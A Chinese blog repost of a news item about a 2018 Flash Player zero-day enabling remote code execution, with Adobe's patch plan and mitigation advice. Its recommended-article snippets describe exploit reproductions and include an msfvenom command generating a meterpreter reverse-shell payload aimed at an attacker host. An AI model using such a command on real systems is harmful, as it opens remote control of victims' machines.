垂死挣扎的 Flash Player 再爆零日漏洞,影响多个平台

最新推荐文章于 2021-07-29 14:58:51 发布
最新推荐文章于 2021-07-29 14:58:51 发布
阅读量944 收藏
点赞数

转自:https://www.oschina.net/news/93070/ecmascript-2018-specification

Adobe Flash Player 自发布以来,就频频被曝出存在大量的严重安全漏洞。随着时代发展,这个曾风光一时的浏览器插件日渐势衰,目前已摇摇欲坠垂死挣扎。

据外媒报道,韩国计算机应急响应小组(KR-CERT)2月1日发布了一个有关 Flash Player 的 0day 漏洞警告。据悉,该漏洞允许在各种平台上执行 RCE (远程代码执行),影响范围包括 Flash Player 的28.0.0.137 及更早之前的版本。28.0.0.137 是最新的 Flash 版本号,漏洞会覆盖 Linux、Mac 和 Windows 平台上的 Flash Player Desktop Runtime ,以及 Chrome 和 Edge 浏览器上的 Flash Player 。

Adobe 随后发布回应漏洞属实,并表示已经确认有黑客在利用该漏洞对 Windows 发起攻击。目前的攻击形式是通过发送嵌入恶意内容的 Flash 文件进行传播,比如 Microsoft Office 文档、网页、垃圾电子邮件等。

Adobe 计划在2月5日发布更新修复漏洞,在此之前推荐用户激活 Protected View 功能,在只读模式下打开文件。

程序员观察
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sucker_punch:Sucker Punch是一个使用并发Ruby的Ruby异步处理库,受Sidekiq和girl_friday的影响很大
02-27
垂死挣扎 Sucker Punch是一个单进程Ruby异步处理库。 这减少了在Heroku之类的服务上托管的成本,并减少了在专用服务器上托管时必须维护其他作业的内存占用。 所有队列都可以在单个应用程序(例如Rails,Sinatra等)...
Flash配置不当漏洞”详解
m0_49025459的博客
01-17 1755
可被用来进行跨域访问,可能会导致“跨站点伪造请求”或“跨站点跟踪”(“跨站点脚本编制”的变体)之类的攻击,从而导致其它用户的信息被非法读取。导致不受信任的第三方域的flash也能访问当前域的资源,绕过同源策略的限制,可为后续渗透攻击做准备,flash的跨域均可能导致XSS,CSRF等问题。Flash 显示程序接受 AllowScriptAccess 之类的对象参数。
Flash漏洞CVE-2018-4878 )复现
锋刃科技的博客
07-29 1340
简介 攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被“远程代码执行”,并且直接被getshell。 影响版本 FlashPlayer28.0.0.137及以前的所有版本 漏洞复现 使用msfvenom生成shell代码 生成代码,其中lhost为kali的ip地址,lport为自定义的端口号 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.111.129 lport=66.
flash跨域劫持漏洞
xixixi
09-13 2675
参考资料1 参考资料2 Adobe Flash 2017年7月25号,在官方博客上宣布到2020年底停止更新Flash,鼓励开发者尽早使用新的标准( HTML5、WebGL 和 WebAssembly)进行开发 ActionScript:(简称AS)是由Macromedia(现已被Adobe收购)为其Flash产品开发的,最初是一种简单的脚本语言,现在最新版本ActionScript...
Flash 0day漏洞CVE-2018-5002)千万不要乱打开Excel文档!
网站安全专家
06-09 1370
腾讯御见威胁情报中心近日监控到一例使用Adobe Flash 0day漏洞CVE-2018-5002)的APT攻击,攻击者疑通过即时聊天工具和邮箱等把恶意Excel文档发送给目标人员,诱骗目标人员打开文档。实际上,该恶意Excel文档经过特别构造,被嵌入了flash对象,用户一旦打开文档电脑就会中毒。CVE-2018-5002影响Adobe Flash Player 29.0.0.171及所有之...
孙子兵法之36计详解.pdf
11-11
这意味着你应该专注于击败一个敌人,而不是试图一次击败多个敌人。这样可以让你更好地集中自己的力量,击败敌人。 第三计:借刀杀人 借刀杀人是指作战的对象已经确定,而朋友的态度还不稳定,要诱导朋友去消灭敌人...
文字编辑版人月神话
05-21
史前史中,没有别的场景比巨兽在焦油坑中垂死挣扎的场面更令人震撼。上帝见证着恐龙、猛犸象、剑齿虎在焦油中挣扎。它们挣扎得越是猛烈,焦油纠缠得越紧,没有任何猛兽足够强壮或具有足够的技巧,能够挣脱束缚,它们...
《人月神话》
05-12
 过去几十年的大型系统开发就犹如这样一个焦油坑,很多大型和强壮的动物在其中剧烈地挣扎。他们中大多数开发出了可运行的系统——不过,其中只有非常少数的项目满足了目标、时间进度和预算的要求。各种团队,大型的...
小学六年级语文选择题300题+答案解析.doc
09-28
1. 小学语文:选择题涵盖了标点符号的正确使用、文学常识、古诗词理解和修辞手法等多个方面。例如,第201题涉及标点符号的正确使用,第202题考察中国四大古典名著的识别,第204题涉及成语和词语的理解与运用,第211...
flash漏洞利用CVE-2018-4878
06-14
flash漏洞利用CVE-2018-4878。 。。。
Flash 0day漏洞CVE-2018-4878复现)
weixin_44897902的博客
10-14 435
漏洞名:CVE-2018-4878 危害:造成远程命令执行 影响范围:Flash Player28.0.0.137及以前的所有版本 准备工作: kail: 192.168.91.146 win7,Flash Player28.0.0.137,IE8 这是一位前辈的Player: 链接:https://pan.baidu.com/s/1dotCoCx0AX8sgUaOqFT9vw 密码:0li0 事...
漏洞复现】Adobe Flash Player安装程序的漏洞|Flash 0day(CVE-2018-15982)
VI___
01-13 455
一、CVE-2018-15982 ——任意代码执行漏洞 2018年11月29日,360高级威胁应对团队在全球范围内第一时间发现一起针对俄罗斯的APT攻击行动,通过一份俄文内容的医院员工问卷文档,携带最新的Flash 0day漏洞和具有自毁功能的专属木马程序,该漏洞CVE-2018-15982)允许攻击者恶意制作的Flash对象在受害者的计算机上执行代码,从而获取对系统命令行的访问权限。 ...
CVE-2018-4878 flash漏洞复现
wh1te 小白的博客
10-22 1174
先将cve-2018-4878拖入虚拟机中 使用msfvenom生成shell代码 lhost为攻击机ip地址  lport为自定义端口号 查看代码文件  进入CVE-2018-4878-master目录,编辑CVE-2018-4878.py文件 将上面msfvenom生成的代码覆盖掉原来的代码: 确认CVE-2018-4878.py下面的文件信息(后面会用到,之后保存...
兴华永恒公司CSO仙果:Flash之殇—漏洞之王Flash Player的末路
CSDN业界要闻
12-01 1132
11月18号,2017看雪安全开发者峰会在北京悠唐皇冠假日酒店举行。来自全国各地的开发人员、网络安全爱好者及相应领域顶尖专家,在2017看雪安全开发者峰会汇聚一堂,只为这场“安全与开发”的技术盛宴。7月份,Adobe 公司正式宣布于 2020 年底停止支持 Flash Player,较之“老兵不死,只是逐渐凋零”平添了几分悲情。时光倒回几年前,那时对挖漏洞的人来说, Flash 是再熟悉不过了,每...
CVE-2018-4878 flash 漏洞利用教程
凝聚力安全团队
10-25 1415
目录漏洞描述漏洞检测漏洞利用漏洞加固参考链接 漏洞描述 漏洞检测 漏洞利用 漏洞加固 参考链接
Flash XSS漏洞快速上手
weixin_50464560的博客
07-29 969
0x01 Flash XSS xss一是指执行恶意js,那么为什么说flash xss呢?是因为flash有可以调用js的函数,也就是可以和js通信,因此这些函数如果使用不当就会造成xss。常见的可触发xss的危险函数有:getURL,navigateToURL,ExternalInterface.call,htmlText,loadMovie等等 0x02 ExternalInterface.call举例 AS中ExternalInterface类是用来和js通信的,调用方法是用来调用js函数的,函数原型
复现漏洞Flash 0day漏洞(CVE-2018-4878)时翻车
t_i_m_e的博客
04-22 927
i春秋有最近新出的flash 0day复现漏洞的步骤,需要用到kali环境,靶机环境以及web服务器环境,此漏洞官方目前还没有推出最新更新版本。步骤一:打开kali用msf生成一个kali虚拟机ip,任意端口的python脚本木马并保存为txt文件步骤二:在root文件夹下新建一个后缀为.py的文档然后将以下代码复制上去(复制大神的,我也不明白都是什么东西)#!/usr/bin/env pytho...
智能锁(远程开锁、指纹开锁、密码开锁、刷卡开锁)
最新发布
07-19
按键功能:输入密码,并能根据密码来决定开门还是进入管理员模式 密码功能:能够更换开门密码/管理员密码,且具有掉电不丢失功能 刷卡功能:能够判断卡片是否登记;刷卡开门;删除/登记开门卡片 指纹功能:指纹开门;删除/登记指纹 语音功能:播放不同功能的语言提示 门铃功能:机械开关控制门铃响 阿里云服务器接入:连接阿里云服务器,可以上报设备信息,也可以通过服务器端无线控制,如修改密码、恢复出厂设置、调节音量大小、远程开门等
使用redis的话怎么节省redis资源,防止redis中的数据堆积
07-21
为了节省Redis资源并防止数据堆积,可以采取以下几个策略: 1. 设置合理的过期时间:在使用Redis存储数据时,根据数据的特性和业务需求,设置适当的过期时间。当数据过期后,Redis会自动删除该数据,从而释放资源。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值